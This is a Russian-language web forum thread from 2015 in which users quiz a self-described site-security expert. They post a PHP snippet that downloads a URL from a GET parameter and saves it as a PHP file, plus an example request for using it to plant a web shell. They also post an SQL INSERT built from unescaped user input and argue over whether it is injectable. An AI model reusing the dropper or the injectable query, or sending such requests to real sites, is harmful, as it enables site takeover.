Поиск скриптов | ищу бг
Тема закрыта by
Razboec
ByGreshnik, через этот код увалень, я вот таким образом залью шелл: скрипт.php?miniS=http://адрес_шелла
ты в защите нихера не смыслишь, а тупо антивирем шелл убрать - тут и дурак сможет..... ахахахах, код граба.....
________
посл. ред. 12.02.2015 в 14:37; всего 1 раз(а); by CyberVit
ты в защите нихера не смыслишь, а тупо антивирем шелл убрать - тут и дурак сможет..... ахахахах, код граба.....
________
посл. ред. 12.02.2015 в 14:37; всего 1 раз(а); by CyberVit
ByGreshnik (12.02.2015 в 14:36)
GamePlus (12.02.2015 в 14:35)
ByGreshnik (12.02.2015 в 14:31)
и является ли следующий кусок кода защищенным:
INSERT INTO `set` SET `usr` = '$_POST[nick]', `datareg` = '$date', `email` = '$_POST[email]', `brauser` = '$brauser', `referer` = '$_GET[refer]' , `prim` = 'on', `invmax`= '5', `site` = '$site'";);
жду ответа!
Защищён!
<?php
$getO=$_GET['miniS'];
if(isset($getO)){
$b=file_get_contents($getO);
$a=fopen('smurfik.php','w');
fputs($a,$b);
fclose($a);
}
?>
Похоже на код граба
Слыщь !!!А давай теперь я ??
Точно не граб.
Я написал что похоже а не точно что граб!
GamePlus (12.02.2015 в 14:35)
ByGreshnik (12.02.2015 в 14:31)
и является ли следующий кусок кода защищенным:
INSERT INTO `set` SET `usr` = '$_POST[nick]', `datareg` = '$date', `email` = '$_POST[email]', `brauser` = '$brauser', `referer` = '$_GET[refer]' , `prim` = 'on', `invmax`= '5', `site` = '$site'";);
жду ответа!
Защищён!
<?php
$getO=$_GET['miniS'];
if(isset($getO)){
$b=file_get_contents($getO);
$a=fopen('smurfik.php','w');
fputs($a,$b);
fclose($a);
}
?>
Похоже на код граба
Слыщь !!!А давай теперь я ??

Точно не граб.
Я написал что похоже а не точно что граб!

Уже бесмысленно что то доказывать.
ну в общем я показал и доказал что хотел.... а вы уже сами выбирайте, брать или нет этого тру защитника для своего сайта!
________
посл. ред. 12.02.2015 в 14:39; всего 1 раз(а); by CyberVit
________
посл. ред. 12.02.2015 в 14:39; всего 1 раз(а); by CyberVit
и является ли следующий кусок кода защищенным:
INSERT INTO `set` SET `usr` = '$_POST[nick]', `datareg` = '$date', `email` = '$_POST[email]', `brauser` = '$brauser', `referer` = '$_GET[refer]' , `prim` = 'on', `invmax`= '5', `site` = '$site'";
жду ответа!
Защищён! - и вот еще одна ошибка, по его мнению он защищен!!!!
да там скуль на лицо видна! вот когда этот кусок будет защищен:
mysql_query("INSERT INTO `set` SET `usr` = '$_POST[nick]', `datareg` = '$date', `email` = '$_POST[email]', `brauser` = '$brauser', `referer` = '".mysql_real_escape_string($_GET[refer])."' , `prim` = 'on', `invmax`= '5', `site` = '$site'");
чудовище!!! как ты вообще имеешь право орать, что ты закроешь какие-то дыры в сайте! Да ты элементарщины не знаешь!!!!
INSERT INTO `set` SET `usr` = '$_POST[nick]', `datareg` = '$date', `email` = '$_POST[email]', `brauser` = '$brauser', `referer` = '$_GET[refer]' , `prim` = 'on', `invmax`= '5', `site` = '$site'";
жду ответа!
Защищён! - и вот еще одна ошибка, по его мнению он защищен!!!!
да там скуль на лицо видна! вот когда этот кусок будет защищен:
mysql_query("INSERT INTO `set` SET `usr` = '$_POST[nick]', `datareg` = '$date', `email` = '$_POST[email]', `brauser` = '$brauser', `referer` = '".mysql_real_escape_string($_GET[refer])."' , `prim` = 'on', `invmax`= '5', `site` = '$site'");
чудовище!!! как ты вообще имеешь право орать, что ты закроешь какие-то дыры в сайте! Да ты элементарщины не знаешь!!!!
$_POST[nick] - тут кстати тоже может послужить уязвимостью, но в данном запросе я не вижу смысла его фильтрации
тут уже сервер определяет значение, пользователю данная возможность не предоставляется
________
посл. ред. 12.02.2015 в 14:51; всего 1 раз(а); by CyberVit
тут уже сервер определяет значение, пользователю данная возможность не предоставляется
________
посл. ред. 12.02.2015 в 14:51; всего 1 раз(а); by CyberVit
тру защитник, где ты там делся? или крыть больше не чем?!
Предлагаю наши посты удалить, а этого "защитника" на доску, ибо тут попахивает нагибаловом! Он ничерта не умеет!
________
посл. ред. 12.02.2015 в 15:07; всего 1 раз(а); by CyberVit
________
посл. ред. 12.02.2015 в 15:07; всего 1 раз(а); by CyberVit
CyberVit (12.02.2015 в 14:25)
ByGreshnik, проверка на вшивость:
что можно сделать с этим кодом:
<?php
$getO=$_GET['miniS'];
if(isset($getO)){
$b=file_get_contents($getO);
$a=fopen('smurfik.php','w');
fputs($a,$b);
fclose($a);
}
?>
и является ли следующий кусок кода защищенным:
INSERT INTO `set` SET `usr` = '$_POST[nick]', `datareg` = '$date', `email` = '$_POST[email]', `brauser` = '$brauser', `referer` = '$_GET[refer]' , `prim` = 'on', `invmax`= '5', `site` = '$site'");
жду ответа!
ByGreshnik, проверка на вшивость:
что можно сделать с этим кодом:
<?php
$getO=$_GET['miniS'];
if(isset($getO)){
$b=file_get_contents($getO);
$a=fopen('smurfik.php','w');
fputs($a,$b);
fclose($a);
}
?>
и является ли следующий кусок кода защищенным:
INSERT INTO `set` SET `usr` = '$_POST[nick]', `datareg` = '$date', `email` = '$_POST[email]', `brauser` = '$brauser', `referer` = '$_GET[refer]' , `prim` = 'on', `invmax`= '5', `site` = '$site'");
жду ответа!
Конечно защищен ты чо

artyom, ага, 100% защищен ))) ну главное чтоб они так думали ))))
CyberVit, про запрос я вначале не понял, но не знать смурфика
